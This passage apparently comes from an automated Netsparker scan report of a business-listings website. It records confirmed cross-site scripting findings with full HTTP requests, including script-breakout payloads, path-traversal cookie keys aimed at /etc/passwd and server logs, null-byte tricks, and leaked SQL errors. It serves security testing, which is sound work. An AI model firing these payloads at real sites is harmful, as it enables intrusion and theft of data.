OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1gfjos41ig74404n9arn5e7885; path=/
Content-Length: 2883
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000519)</script>/' union select prj.catI' at line 5
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
password1 POST '"--></style></script><script>alert(0x00050D)</script>
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 327
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00050D)%3c%2fscript%3e&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:22 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=F629F5EE3569B8BB2A496694BB1E1642; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x000547)</script>

Request

GET /ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000547)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=g7vscnkspqm6768cii4hjuotj1; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000547)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/phsy00/

/ppc/leadflow/phsy00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x00054C)</script>

Request

GET /ppc/leadflow/phsy00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00054C)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 